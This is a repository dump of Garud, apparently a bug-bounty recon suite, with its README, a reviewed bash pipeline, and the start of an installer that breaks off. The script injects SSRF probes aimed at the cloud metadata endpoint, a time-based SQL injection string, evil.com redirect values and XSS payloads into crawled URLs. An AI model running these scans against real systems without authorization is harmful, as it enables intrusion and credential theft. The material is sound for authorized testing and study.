21 | 22 | The script first enumerates all the subdomains of the given target domain using assetfinder, sublister, subfinder and amass, then filters the live domains out of the whole subdomain list. It then extracts the titles of the subdomains using httpx and scans for subdomain takeover using nuclei. Next it uses gauplus to extract the parameters of the given subdomains and uses gf patterns to filter XSS, SSTI, SSRF and SQLi parameters from those subdomains (the gf patterns match on parameter names such as `id=` or `url=`, so the results are candidates to test rather than confirmed findings), and it scans for low-hanging fruit as well. It saves all the output in a text file like target-xss.txt, and finally sends notifications about the scan using notify.
23 | 24 | ```txt 25 | What's new in v4.0: fixed some previous issues and filter out time waste vulns(you need to find them manually) and added dorking. 26 | ``` 27 | 28 |

How garud works

29 |


30 | garud mindmap
31 | 32 |


33 | 34 |

Installation

35 | 36 | **Requirements:** ``Go Language`` and ``Python 3``.
37 | **System requirements:** Recommended to run on vps with ``1VCPU`` and ``2GB RAM``.
38 | 39 | **Tools used - You must install these tools to use this script**
40 | 41 | `subfinder` • 42 | `sublist3r` • 43 | `gf patterns` • 44 | `dnsx` • 45 | `assetfinder` • 46 | `httpx` • 47 | `kxss` • 48 | `nuclei` • 49 | `dalfox` • 50 | `anew` • 51 | `notify` • 52 | `aquatone` • 53 | `amass` • 54 | `gau` • 55 | `crlfuzz` • 56 | `uro` • 57 | `ffuf` • 58 | `naabu` • 59 | `crobat` • 60 | `gobuster` • 61 | `gospider` • 62 | `waybackurls`
63 | 64 | 65 | ```bash 66 | #Make sure you're root before installing the tool 67 | 68 | garud:~ sudo su 69 | garud:~ apt install git 70 | garud:~ git clone https://github.com/R0X4R/Garud.git && cd Garud/ && chmod +x garud install.sh && mv garud /usr/bin/ && ./install.sh 71 | ``` 72 | 73 | > **Note**: If you encounter any issue while running the `install.sh` file or `garud`, run `sed -i -e 's/\r$//' install.sh` (this strips the Windows-style carriage returns that cause the `/bin/bash^M` error). 74 | 75 |

Usage

76 | 77 | 78 | ```js 79 | 80 | 81 | █▀▀▀ █▀▀█ █▀▀█ █░░█ █▀▀▄ 82 | █░▀█ █▄▄█ █▄▄▀ █░░█ █░░█ 83 | ▀▀▀▀ ▀░░▀ ▀░▀▀ ░▀▀▀ ▀▀▀░ 84 | 85 | [GARUD] == A RECONNAISSANCE SUITE FOR BUG BOUNTY (@R0X4R) 86 | 87 | Example Usage: 88 | garud [-d target.tld] [-x exclude domains] [--json] [-s] 89 | 90 | Flags: 91 | -d, --domain string Add your target -d target.tld 92 | -x, --exclude string Exclude out of scope domains -x /home/dommains.list 93 | 94 | Optional Flags: 95 | -s, --silent Hide output in the terminal Default: False 96 | -j, --json Store output in a single json file Default: False 97 | -v, --version Print current version of Garud 98 | 99 | ``` 100 | 101 | **Fix errors while using or installing Garud** 102 | 103 | ```bash 104 | garud:~ chmod +x install.sh && ./install.sh 105 | Error: ./install.sh : /bin/bash^M : bad interpretor: No such file or directory 106 | 107 | # fix 108 | garud:~ sed -i -e 's/\r$//' install.sh 109 | ``` 110 | You can also copy the error and search on google this will make your debugging skills better ;) 111 | 112 | **Example Usage** 113 | 114 | ```txt 115 | # garud -d hackerone.com 116 | ``` 117 | Exclude out of scope domains 118 | ```txt 119 | # echo test.hackerone.com > ossdomain.txt 120 | # garud -d hackerone.com -x ~/ossdomain.txt 121 | ``` 122 | With all flags 123 | ```txt 124 | # garud -d hackerone.com -j -s -x /home/oss.txt 125 | ``` 126 | 127 | Hide output in the terminal 128 | 129 | ```txt 130 | # garud -d hackerone.com -s 131 | ``` 132 | 133 | Store output in a single `json` file 134 | 135 | ```txt 136 | # garud -d hackerone.com -s -j 137 | # cd hackerone 138 | # cat output.json | jq 139 | { 140 | "nuclei_critical": [], 141 | "vuln_crlf": [], 142 | "dalfox": [ 143 | "[POC][V][GET][inATTR-double(3)-URL] http://subdomain.target.tld/hpp?pp=FUZZ%22onpointerout%3Dconfirm.call%28null%2C1%29+class%3Ddalfox+", 144 | ----------------------snip---------------------- 145 | "subdomains": [ 146 | "sub.target.tld", 147 | "tub.target.tld", 148 | 
"subdomain.target.tld" 149 | ], 150 | "vuln_xss": [ 151 | "[POTENTIAL XSS] - http://subdomain.target.tld/hpp/?pp=%22%3E%2F%3E%3Csvg%2Fonload%3Dconfirm%28document.domain%29%3E ", 152 | "[POTENTIAL XSS] - http://subdomain.target.tld:80/hpp/?pp=%22%3E%2F%3E%3Csvg%2Fonload%3Dconfirm%28document.domain%29%3E ", 153 | "[POTENTIAL XSS] - http://subdomain.target.tld:80/hpp/index.php?pp=%22%3E%2F%3E%3Csvg%2Fonload%3Dconfirm%28document.domain%29%3E " 154 | ] 155 | } 156 | ``` 157 | 158 | **Docker** 159 | 160 | Contributed by [`@frost19k`](https://github.com/frost19k) 161 | 162 | This image needs to be built with [`Buildkit`](https://docs.docker.com/develop/develop-images/build_enhancements/) 163 | ```bash 164 | garud:~ git clone https://github.com/R0X4R/Garud.git 165 | garud:~ cd Garud 166 | garud:~ docker buildx build -t garud -f Dockerfile . 167 | ``` 168 | 169 | To run the container 170 | ```bash 171 | garud:~ docker run -t --rm \ 172 | -v "/path/on/host":"/output" \ # Mount the Host Output Folder to "/output" 173 | -v "/path/to/configs":"/Garud/.config/notify" \ # Mount your Notify Config files to "/Garud/.config/notify" 174 | garud -d hackerone.com 175 | ``` 176 | Garud runs as root inside the container & so it is advisable to configure Linux Namespaces 177 | 1. [Isolate containers with a user namespace](https://docs.docker.com/engine/security/userns-remap/) 178 | 2. [Use Linux user namespaces to fix permissions in docker volumes](https://www.jujens.eu/posts/en/2017/Jul/02/docker-userns-remap/) 179 | 180 |

Notifications

181 | 182 | [`@slack`](https://slack.com/intl/en-it/help/articles/115005265063-Incoming-webhooks-for-Slack) • 183 | [`@discord`](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) • 184 | [`@telegram`](https://core.telegram.org/bots#3-how-do-i-create-a-bot) • 185 | [`configure-notify`](https://github.com/projectdiscovery/notify#config-file) 186 | 187 |

188 |

Donate

189 | 190 | |[`buymeacoffee.com/R0X4R`](https://www.buymeacoffee.com/R0X4R)|[`payU India`](https://pmny.in/bIKNZngt4ys1)|[`kofi.com/R0X4R`](https://ko-fi.com/i/IK3K34SJSA)| 191 | |--------|--------|------| 192 | 193 | ### Thanks to the authors of the tools used in this script. 194 | 195 | [`@aboul3la`](https://github.com/aboul3la) [`@tomnomnom`](https://github.com/tomnomnom) [`@lc`](https://github.com/lc) [`@hahwul`](https://github.com/hahwul) [`@projectdiscovery`](https://github.com/projectdiscovery) [`@maurosoria`](https://github.com/maurosoria) [`@shelld3v`](https://github.com/shelld3v) [`@devanshbatham`](https://github.com/devanshbatham) [`@michenriksen`](https://github.com/michenriksen) [`@defparam`](https://github.com/defparam/) [`@projectdiscovery`](https://github.com/projectdiscovery) [`@bp0lr`](https://github.com/bp0lr/) [`@ameenmaali`](https://github.com/ameenmaali) [`@dwisiswant0`](https://github.com/dwisiswant0) [`@OWASP`](https://github.com/OWASP/) [`@1ndianl33t`](https://github.com/1ndianl33t) [`@sqlmapproject`](https://github.com/sqlmapproject) [`@w9w`](https://github.com/w9w) [`@OJ`](https://github.com/OJ) [`@jaeles-project`](https://github.com/jaeles-project) [`@s0md3v`](https://github.com/s0md3v) [`@ffuf`](https://github.com/ffuf) 196 | 197 | Thanks to all the contributors [`contributors.md`](.github/contributors.md) 198 | 199 | **Warning:** This code was originally created for personal use, it generates a substantial amount of traffic, please use with caution. 
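200 |
--------------------------------------------------------------------------------
/garud:
--------------------------------------------------------------------------------
#!/usr/bin/env bash
# coded by R0X4R
# Garud - version 4.0
# Contributors: KathanP19 (https://github.com/KathanP19), frost19k (https://github.com/frost19k), f8al (https://github.com/f8al), theamanrawat (https://github.com/theamanrawat), remonsec (https://github.com/remonsec), simrotion13 (https://github.com/simrotion13)
#
# Pipeline: passive/active subdomain enumeration -> DNS resolution -> port scan
# and HTTP probing -> crawling -> pattern filtering -> nuclei and injection
# checks -> directory fuzzing. All output goes to a per-run directory.
#
# Hardening in this listing:
#  - The target (-d) is validated before it is used in paths, URLs and commands.
#  - The exclude file (-x) must exist and is made absolute, because the script
#    later changes directory; a relative or mistyped path used to disable
#    scope filtering silently.
#  - Lines read from result files (hostnames, crawled URLs) are handed to the
#    per-item shells as positional arguments instead of being pasted into the
#    `bash -c` command string, so remote-controlled text is never parsed as
#    shell code.

#@> CHECK CONNECTION
if ! wget -q --spider http://google.com; then
    echo "Connect to internet before running Garud!"
    exit 127
fi

#@> VARIABLES
DM=           # target domain (-d)
EC=           # file with out-of-scope patterns (-x)
SL=False      # "False" means results are echoed to the terminal
JO=False      # anything other than "False" enables the JSON export
RO=False      # not set by any flag in this script
VR="Garud v4.0"
PR="21,22,80,81,280,300,443,583,591,593,832,981,1010,1099,1311,2082,2087,2095,2096,2480,3000,3128,3333,4243,4444,4445,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7002,7396,7474,8000,8001,8008,8009,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8530,8531,8834,8880,8887,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,10443,11371,12043,12046,12443,15672,16080,17778,18091,18092,20720,28017,32000,55440,55672"
# User-Agent header sent by the HTTP-based steps below.
UA="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"

#@> COLORS
BK="\e[7m"
RT="\e[0m"
YW="\e[93m"
GR="\e[32m"

#@> BANNER TEXT (shared by PRINT_USAGE and INFOM)
BANNER(){
    echo -e ""
    echo -e "${YW}
\t\t█▀▀▀ █▀▀█ █▀▀█ █░░█ █▀▀▄
\t\t█░▀█ █▄▄█ █▄▄▀ █░░█ █░░█
\t\t▀▀▀▀ ▀░░▀ ▀░▀▀ ░▀▀▀ ▀▀▀░
${RT}"
    echo -e "[${YW}GARUD${RT}] == A RECONNAISSANCE SUITE FOR BUG BOUNTY (${BK}@R0X4R${RT})"
}

#@> PRINT USAGE
# Prints the banner and the flag summary, then exits with status 0.
PRINT_USAGE(){
    BANNER
    echo -e ""
    echo -e "Example Usage:"
    echo -e "garud [-d target.tld] [-x exclude domains] [--json] [-s]"
    echo -e ""
    echo -e "Flags:"
    echo -e " -d, --domain ${BK}string${RT} Add your target -d target.tld"
    echo -e " -x, --exclude ${BK}string${RT} Exclude out of scope domains -x /home/dommains.list"
    echo -e ""
    echo -e "${BK}Optional Flags: ${RT}"
    echo -e " -s, --silent Hide output in the terminal ${GR}Default: ${BK}False${RT}"
    echo -e " -j, --json Store output in a single json file ${GR}Default: ${BK}False${RT}"
    echo -e " -v, --version Print current version of Garud"
    exit 0
}

#@> ARGUMENTS
while [ -n "$1" ]; do
    case "$1" in
        -d|--domain)
            DM="$2"
            shift ;;

        -h|--help)
            PRINT_USAGE ;;

        -j|--json)
            JO='true' ;;

        -s|--silent)
            SL='true' ;;

        -x|--exclude)
            EC="$2"
            shift ;;

        -v|--version)
            echo -e "$VR"
            exit 0 ;;

        *)
            PRINT_USAGE
    esac
    shift
done

#@> INITIAL CONFIGS
if [ -z "$DM" ]; then
    echo -e "\n${BK}ERROR${RT} - TARGET NOT SUPPLIED."
    PRINT_USAGE
fi

# $DM becomes part of a directory name, of URLs, of grep patterns and of tool
# arguments, so only hostname characters are accepted (no "/", spaces, quotes,
# "$" or a leading "-").
if ! [[ "$DM" =~ ^[A-Za-z0-9][A-Za-z0-9._-]*$ ]]; then
    echo -e "\n${BK}ERROR${RT} - TARGET IS NOT A VALID DOMAIN NAME."
    exit 1
fi

# Fail closed on the scope file: INFOM changes directory, so a relative path
# would stop resolving and the exclusion in SUBD_CHCK would be skipped.
if [ -n "$EC" ]; then
    if [ ! -f "$EC" ]; then
        echo -e "\n${BK}ERROR${RT} - EXCLUDE FILE NOT FOUND: $EC"
        exit 1
    fi
    EC="$(cd "$(dirname "$EC")" && pwd)/$(basename "$EC")"
fi

if [ "$RO" == "true" ]; then
    JO='true'
fi

#@> DOCKER
if [ -z "$CHROME_BIN" ]; then
    CHROME_BIN="/snap/bin/chromium"
fi

#@> EXIT FUNCTION
trap ctrl_c INT
ctrl_c(){
    echo -e ""
    echo -e "${YW} [!] ${RT} KEYBOARD INTERRUPTION, ${GR}EXITING GARUD${RT}..."
    exit 127
}

#@> BANNER
# Creates the per-run output directory (<domain without TLD>_<timestamp>),
# enters it and announces the start of the scan.
INFOM(){
    clear
    BANNER
    # %m is the month; the listing used %M (minutes) in the date part.
    OT="$(printf '%s' "$DM" | sed -e 's/\.[a-z]*$//')_$(date +"%Y_%m_%d-%H_%M_%S")"
    mkdir -p "$OT" 2> /dev/null
    # Every later path is relative, so stop if the directory cannot be entered.
    cd "$OT" || exit 1
    echo -e ""
    echo -e "${BK}DOMAIN> ${RT}" | tr -d "\n"; echo -e " $DM" | pv -qL 6
    echo -e "${BK}OUTPUT> ${RT}" | tr -d "\n"; echo -e " $(pwd | sed 's/\// < /g' | cut -c 4-)" | pv -qL 6
    echo -e "[GARUD] - Scanning started on $DM at $(date)" | notify -silent
}

#@> MAKE FOLDERS
MAKDR(){
    mkdir -p .tmp
    mkdir -p database
    mkdir -p database/.gf
    mkdir -p database/dirs
    mkdir -p vulns
    [ "$JO" == "False" ] || mkdir -p .json
}

#@> JSON EXPORT
# TO_JSON KEY INFILE OUTNAME
# When the JSON export is enabled, writes {"KEY": [<lines of INFILE>]} to
# .json/OUTNAME. Line endings are removed in Python; the listing stripped the
# two characters "\n" from the JSON text with sed, which also altered values
# that contain a backslash.
TO_JSON(){
    [ "$JO" == "False" ] && return 0
    cat "$2" 2> /dev/null | python3 -c 'import sys, json; print(json.dumps({sys.argv[1]: [ln.rstrip("\n") for ln in sys.stdin]}))' "$1" > ".json/$3" 2> /dev/null
}

#@> SUBDOMAIN ENUMERATION
# Passive sources only: certificate transparency, third-party indexes, OSINT tools.
# NOTE(review): "$DM" is used below as an unanchored regular expression, so "."
# matches any character and longer names that merely contain the target pass.
SUBD_PASV(){
    curl -s "https://crt.sh/?q=%25.$DM&output=json" | jq -r '.[].name_value' 2>/dev/null | sed 's/\*\.//g' | sort -u | grep -o "\w.*$DM" | anew -q .tmp/cert.list
    curl -s "https://api.hackertarget.com/hostsearch/?q=$DM" | grep -o "\w.*$DM" | anew -q .tmp/htarget.list
    curl -s "https://riddler.io/search/exportcsv?q=pld:$DM" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep -o "\w.*$DM" | anew -q .tmp/riddler.list
    assetfinder --subs-only "$DM" | anew -q .tmp/assetfinder.list
    python3 ~/tools/Sublist3r/sublist3r.py -d "$DM" -o .tmp/sublister.list &> /dev/null
    subfinder -silent -d "$DM" -all -t 100 -o .tmp/subfinder.list &> /dev/null
    amass enum -passive -d "$DM" -o .tmp/amass.list &> /dev/null
    crobat -s "$DM" | anew -q .tmp/crobat.list
}

# Active enumeration: virtual-host and DNS brute force with the subdomain wordlist.
SUBD_ACTV(){
    timeout 50m ffuf -u "http://FUZZ.$DM/" -t 100 -p '1.0-2.0' -w ~/wordlists/subdomains.txt -H "User-Agent: $UA" -mc 200 -r -o .tmp/ffuf.json -s &> /dev/null
    timeout 50m gobuster dns -d "$DM" --no-error -z -q -t 100 -w ~/wordlists/subdomains.txt 2> /dev/null | sed 's/Found: //g' | anew -q .tmp/gobuster.list
    timeout 50m amass enum -active -brute -w ~/wordlists/subdomains.txt -d "$DM" -o .tmp/amassact.list &> /dev/null
    jq -r '.results[] | .host' .tmp/ffuf.json 2> /dev/null | anew -q .tmp/ffuf.list && rm -f .tmp/ffuf.json
}

# Second pass: re-run passive enumeration on every name found so far.
SUBD_SCND(){
    # NOTE(review): the listing had a line break inside this sed expression
    # where a token appears to have been lost in extraction; "<BR>" is assumed
    # here and in SUBD_CHCK - confirm against the upstream file.
    cat .tmp/*.list | grep -v "*" | sed '/@\|<BR>\|\_\|*/d' | grep "$DM" | anew -q .tmp/domains
    # Each name is passed as "$1"; it is never part of the command string.
    xargs -a .tmp/domains -P 50 -I {} bash -c 'assetfinder --subs-only "$1" | anew -q .tmp/seconddomains.list' _ {} 2> /dev/null
    timeout 30m xargs -a .tmp/domains -P 10 -I {} bash -c 'amass enum -passive -d "$1"' _ {} 2> /dev/null | anew -q .tmp/seconddomains.list
}

# Resolves the collected names, port-scans and HTTP-probes them, takes screenshots.
SUBD_CHCK(){
    #@> FILTERING DOMAINS
    # NOTE(review): unlike SUBD_SCND, nothing here restricts the names to "$DM";
    # whatever the sources returned is resolved and then port-scanned unless the
    # -x file removes it.
    if [ -f "$EC" ]; then
        cat .tmp/*.list | grep -v "*" | grep -vf "$EC" | sort -u | sed '/@\|<BR>\|\_\|*/d' | dnsx -a -aaaa -cname -ns -ptr -mx -soa -retry 3 -r ~/wordlists/resolvers.txt -t 10 -silent | anew -q database/subdomains.txt
    else
        cat .tmp/*.list | grep -v "*" | sort -u | sed '/@\|<BR>\|\_\|*/d' | dnsx -a -aaaa -cname -ns -ptr -mx -soa -retry 3 -r ~/wordlists/resolvers.txt -t 10 -silent | anew -q database/subdomains.txt
    fi

    #@> WEB PROBING AND SCREENSHOT
    naabu -retries 3 -r ~/wordlists/resolvers.txt -l database/subdomains.txt -p "$PR" -silent -no-color 2> /dev/null | anew -q database/ports.txt
    httprobe -prefer-https < database/ports.txt | anew -q database/lives.txt
    xargs -a database/lives.txt -P 50 -I {} bash -c 'printf "%s\n" "$1" | aquatone -chrome-path "$2" -out database/screenshots/ -threads 10 -silent' _ {} "$CHROME_BIN" &> /dev/null
    TO_JSON liveurls database/lives.txt liveurls.json
    TO_JSON subdomains database/subdomains.txt subdomains.json
    TO_JSON ports database/ports.txt ports.json
}

SUBD_SCAN(){
    echo -e ""
    echo -e "${BK} ${RT}" | tr -d '\n' | pv -qL 4; echo -e " STARTING SUBDOMAIN SCANNING ON ${BK}$DM${RT} (${YW}it may take time${RT})"
    SUBD_PASV
    SUBD_ACTV
    SUBD_SCND
    SUBD_CHCK
    [ "$SL" == "False" ] && cat database/lives.txt 2> /dev/null
    echo -e "Subdomain enumeration completed, total [Subdomains:$(cat database/subdomains.txt | wc -l) Activeurls:$(cat database/lives.txt | wc -l)] found" | notify -silent &> /dev/null
}

#@> WEB CRAWLING AND FILTERING
# GF_MARK PATTERN VALUE
# Selects URLs matching gf pattern PATTERN, strips quotes and parentheses, sets
# every parameter to VALUE with bhedak and stores them in database/.gf/PATTERN.list.
GF_MARK(){
    gf "$1" database/urls.txt | sed "s/'\|(\|)//g" | bhedak "$2" 2> /dev/null | anew -q "database/.gf/$1.list"
}

WEBC_RAWL(){
    echo -e "${BK} ${RT}" | tr -d '\n' | pv -qL 6; echo -e " STARTING WEBCRAWLING ON ${BK}$DM${RT} (${YW}it may take time${RT})"
    agnee -d "$DM" -q -o database/dorks.txt -p 4
    timeout 50m gospider -S database/lives.txt -d 10 -c 20 -t 50 -K 3 --no-redirect --js -a -w --blacklist ".(eot|jpg|jpeg|gif|css|tif|tiff|png|ttf|otf|woff|woff2|ico|svg|txt)" --include-subs -q -o .tmp/gospider 2> /dev/null | anew -q .tmp/gospider.list
    xargs -a database/lives.txt -P 50 -I {} bash -c 'printf "%s\n" "$1" | waybackurls' _ {} 2> /dev/null | anew -q .tmp/waybackurls.list
    xargs -a database/lives.txt -P 50 -I {} bash -c 'printf "%s\n" "$1" | gau --blacklist eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,svg,txt --retries 3 --threads 50' _ {} 2> /dev/null | anew -q .tmp/gau.list &> /dev/null
    # Filtering duplicate and common endpoints.
    # NOTE(review): grep "$DM" keeps any URL that contains the target string
    # anywhere (path, query, look-alike host), not only URLs on the target.
    cat .tmp/gospider.list .tmp/gau.list .tmp/waybackurls.list 2> /dev/null | sed '/\[/d' | grep "$DM" | sort -u | uro | anew -q database/urls.txt
    TO_JSON endpoints database/urls.txt urls.json

    #@> FILTERING ENDPOINTS USING PATTERNS
    GF_MARK xss "FUZZ"
    GF_MARK lfi "FUZZ"
    GF_MARK rce "FUZZ"
    GF_MARK ssrf "http://169.254.169.254/latest/meta-data/hostname"
    GF_MARK ssti "FUZZ"
    GF_MARK sqli "(select(0)from(select(sleep(5)))v)"
    GF_MARK redirect "http://www.evil.com/"

    xargs -a database/.gf/xss.list -P 30 -I {} bash -c 'printf "%s\n" "$1" | kxss' _ {} 2> /dev/null | grep "< >\|\"" | awk '{print $2}' | anew -q .tmp/xssp.list
    cat .tmp/xssp.list 2> /dev/null | bhedak "\">/>" 2> /dev/null | anew -q .tmp/xss.txt
}

#@> NUCLEI SCAN
# Runs the nuclei templates once per severity; findings above "info" are also
# sent through notify.
NUCL_SCAN(){
    echo -e "${BK} ${RT}" | tr -d '\n' | pv -qL 6; echo -e " STARTING NUCLEI VULNERABILITY SCANNING ON ${BK}$DM${RT} (${YW}it may take time${RT})"
    nuclei -update-templates &> /dev/null
    xargs -a database/lives.txt -P 50 -I {} bash -c 'nuclei -target "$1" -t ~/nuclei-templates/ -nc -s info -c 10 -silent' _ {} 2> /dev/null | anew -q vulns/nuclei.txt
    for sev in low medium high critical; do
        xargs -a database/lives.txt -P 50 -I {} bash -c 'nuclei -target "$1" -t ~/nuclei-templates/ -nc -s "$2" -c 10 -silent' _ {} "$sev" 2> /dev/null | anew vulns/nuclei.txt | notify -silent &> /dev/null
    done
    TO_JSON nuclei_info vulns/nuclei.txt nuclei.json
    [ "$SL" == "False" ] && cat vulns/nuclei.txt
}

#@> VULNERABILITY SCANNING
# Response-based checks on the pattern-filtered URLs. Every hit is labelled
# "POTENTIAL": the checks look for a marker string in the response and need
# manual confirmation.
VULN_SCAN(){
    echo -e "${BK} ${RT}" | tr -d '\n' | pv -qL 6; echo -e " STARTING INJECTION VULNERABILITY SCANNING ON ${BK}$DM${RT} (${YW}it may take time${RT})"

    crlfuzz -l database/lives.txt -c 50 -s | anew vulns/crlf.txt | notify -silent &> /dev/null
    [ "$SL" == "False" ] && cat vulns/crlf.txt 2> /dev/null
    TO_JSON vuln_crlf vulns/crlf.txt crlf.json

    cat database/urls.txt | cut -d"?" -f1 | cut -d"=" -f1 | grep -iaE "([^.]+)\.zip$|([^.]+)\.zip\.[0-9]+$|([^.]+)\.zip[0-9]+$|([^.]+)\.zip[a-z][A-Z][0-9]+$|([^.]+)\.zip\.[a-z][A-Z][0-9]+$|([^.]+)\.rar$|([^.]+)\.tar$|([^.]+)\.tar\.gz$|([^.]+)\.tgz$|([^.]+)\.sql$|([^.]+)\.db$|([^.]+)\.sqlite$|([^.]+)\.pgsql\.txt$|([^.]+)\.mysql\.txt$|([^.]+)\.gz$|([^.]+)\.config$|([^.]+)\.log$|([^.]+)\.bak$|([^.]+)\.backup$|([^.]+)\.bkp$|([^.]+)\.crt$|([^.]+)\.dat$|([^.]+)\.eml$|([^.]+)\.java$|([^.]+)\.lst$|([^.]+)\.key$|([^.]+)\.passwd$|([^.]+)\.pl$|([^.]+)\.pwd$|([^.]+)\.mysql-connect$|([^.]+)\.jar$|([^.]+)\.cfg$|([^.]+)\.dir$|([^.]+)\.orig$|([^.]+)\.bz2$|([^.]+)\.old$|([^.]+)\.vbs$|([^.]+)\.img$|([^.]+)\.inf$|([^.]+)\.sh$|([^.]+)\.py$|([^.]+)\.vbproj$|([^.]+)\.mysql-pconnect$|([^.]+)\.war$|([^.]+)\.go$|([^.]+)\.psql$|([^.]+)\.sql\.gz$|([^.]+)\.vb$|([^.]+)\.webinfo$|([^.]+)\.jnlp$|([^.]+)\.cgi$|([^.]+)\.tmp$|([^.]+)\.ini$|([^.]+)\.webproj$|([^.]+)\.xsql$|([^.]+)\.raw$|([^.]+)\.inc$|([^.]+)\.lck$|([^.]+)\.nz$|([^.]+)\.rc$|([^.]+)\.html\.gz$|([^.]+)\.gz$|([^.]+)\.env$|([^.]+)\.yml$" | httpx -silent -follow-host-redirects | anew -q vulns/files.txt &> /dev/null
    TO_JSON sensitive vulns/files.txt files.json

    # NOTE(review): the match string of this grep is empty in the listing
    # (possibly lost in extraction); as shown it matches every non-empty
    # response, so each URL in .tmp/xss.txt that answers is reported.
    xargs -a .tmp/xss.txt -P 50 -I {} bash -c 'curl -s -L -H "X-Bugbounty: Testing" -H "User-Agent: $2" --insecure "$1" | grep -q "" && printf "[POTENTIAL XSS] - %s \n" "$1"' _ {} "$UA" 2> /dev/null | grep "POTENTIAL XSS" | anew vulns/xss.txt | notify -silent &> /dev/null
    [ "$SL" == "False" ] && cat vulns/xss.txt 2> /dev/null
    TO_JSON vuln_xss vulns/xss.txt xss.json

    xargs -a database/.gf/ssrf.list -P 50 -I {} bash -c 'curl -ks -H "X-Bugbounty: Testing" -H "User-Agent: $2" --insecure "$1" | grep -q "compute.internal" && printf "[POTENTIAL SSRF] - %s \n" "$1"' _ {} "$UA" 2> /dev/null | grep "POTENTIAL SSRF" | anew vulns/ssrf.txt | notify -silent &> /dev/null
    [ "$SL" == "False" ] && cat vulns/ssrf.txt 2> /dev/null
    TO_JSON vuln_ssrf vulns/ssrf.txt ssrf.json

    xargs -a database/.gf/redirect.list -P 50 -I {} bash -c 'curl -s -iL -H "X-Bugbounty: Testing" -H "User-Agent: $2" --insecure "$1" | grep -q "Evil.Com - We get it...Daily" && printf "[POTENTIAL REDIRECT] - %s \n" "$1"' _ {} "$UA" 2> /dev/null | grep "POTENTIAL REDIRECT" | anew vulns/redirect.txt | notify -silent &> /dev/null
    [ "$SL" == "False" ] && cat vulns/redirect.txt 2> /dev/null
    TO_JSON vuln_redirect vulns/redirect.txt redirect.json

    # NOTE(review): jeeves is not among the tools install.sh installs in this listing.
    timeout 50m xargs -a database/.gf/sqli.list -P 50 -I {} bash -c 'printf "%s\n" "$1" | jeeves --payload-time 5' _ {} | grep "Vulnerable To" | anew vulns/sqli.txt | notify -silent &> /dev/null
    [ "$SL" == "False" ] && cat vulns/sqli.txt 2> /dev/null
    # The listing wrote these results to .json/redirect.json under the key
    # 'vuln_redirect', overwriting the open-redirect results.
    TO_JSON vuln_sqli vulns/sqli.txt sqli.json

    dalfox file .tmp/xssp.list --silence --no-color --waf-evasion --no-spinner --mass --mass-worker 100 --skip-bav -w 100 -H "X-Bugbounty: Testing" -H "User-Agent: $UA" 2> /dev/null | anew vulns/dalfoxss.txt | notify -silent &> /dev/null
    [ "$SL" == "False" ] && cat vulns/dalfoxss.txt 2> /dev/null
    TO_JSON dalfox vulns/dalfoxss.txt dalfox.json

    # Merge the per-step JSON objects into one file.
    [ "$JO" == "False" ] || jq -s 'add' .json/*.json > output.json 2> /dev/null
}

#@> DIRECTORY FUZZING
FUZZ_DIRS(){
    echo -e "${BK} ${RT}" | tr -d '\n' | pv -qL 6; echo -e " STARTING DIRECTORY FUZZING ON ${BK}$DM${RT} (${YW}it may take time${RT})"
    # Read line by line on fd 3 so entries are not word-split or glob-expanded
    # and the tools inside the loop keep their own stdin.
    while IFS= read -r target <&3; do
        [ -n "$target" ] || continue
        # scheme://host:port -> host_port, used as the output file name
        fuzzout=$(printf '%s\n' "$target" | awk -F// '{print $NF}' | sed -E 's/[\.|:]+/_/g')
        ffuf -u "$target/FUZZ" -ac -t 100 -mc 200 -sf -H "User-Agent: $UA" -w ~/wordlists/fuzz.txt -p '0.6-1.2' -e .html,.json,.php,.asp,.aspx,.log,.sql,.txt,.asp,.jsp,.bak,~,.db -maxtime 900 -o "database/dirs/$fuzzout.json" -s &> /dev/null
        jq -r '.results[] | .status, .length, .url' "database/dirs/$fuzzout.json" 2> /dev/null | xargs -n3 | anew -q "database/dirs/$fuzzout.txt"
        rm -f "database/dirs/$fuzzout.json"
    done 3< database/lives.txt
}

#@> SENDING FINAL NOTIFICATION
SEND_NOTE(){
    echo -e ""
    echo -e "${BK} SCANNING COMPLETED SUCCESSFULLY ON $DM ${RT}"
    echo -e "[GARUD] - Scanning completed on $DM at $(date)" | notify -silent
}

# Runs every stage in order; stderr of each stage is discarded.
VAULT(){
    SUBD_SCAN 2> /dev/null
    WEBC_RAWL 2> /dev/null
    NUCL_SCAN 2> /dev/null
    VULN_SCAN 2> /dev/null
    FUZZ_DIRS 2> /dev/null
    SEND_NOTE 2> /dev/null
}

INFOM
MAKDR
VAULT
exit

--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Installer for Garud's dependencies. It must run as root: it writes to
# /usr/local and /usr/bin and installs system packages.
#
# NOTE(review): every tool below is fetched at @latest / @master, from an
# unpinned branch or as the newest PyPI release, then built and copied into
# /usr/bin as root, with no version pin and no checksum. Pin versions and
# verify digests where a reproducible, auditable install is required.
# NOTE(review): "~" resolves to root's home here, and garud reads ~/tools and
# ~/wordlists, so garud finds them only when run with the same home directory.
BK="\e[7m"
RT="\e[0m"
GR="\e[32m"
YW="\e[93m"

if [ "$EUID" -ne 0 ]; then
    echo -e "MAKE SURE YOU'RE ROOT BEFORE RUNNING THE SCRIPT"
    exit 1
fi

# report CMD [ARGS...]: print SUCCESS when CMD succeeds, FAILED otherwise.
report(){
    if "$@" &> /dev/null; then
        echo -e "${GR}SUCCESS${RT}"
    else
        echo -e "${YW}FAILED${RT}"
    fi
}

# go_tool NAME PACKAGE: `go install` PACKAGE and check that ~/go/bin/NAME exists.
go_tool(){
    echo -e "\n- Installing $1"
    go install "$2" > /dev/null 2>&1
    report test -f ~/go/bin/"$1"
}

# go_from_source NAME REPO [SUBDIR]: clone REPO into ~/tools/.tmp/NAME and run
# `go install` in SUBDIR (default: repository root). The build runs in a
# subshell so the caller's working directory is unchanged.
go_from_source(){
    local name="$1" repo="$2" subdir="${3:-.}"
    echo -e "\n- Installing $name"
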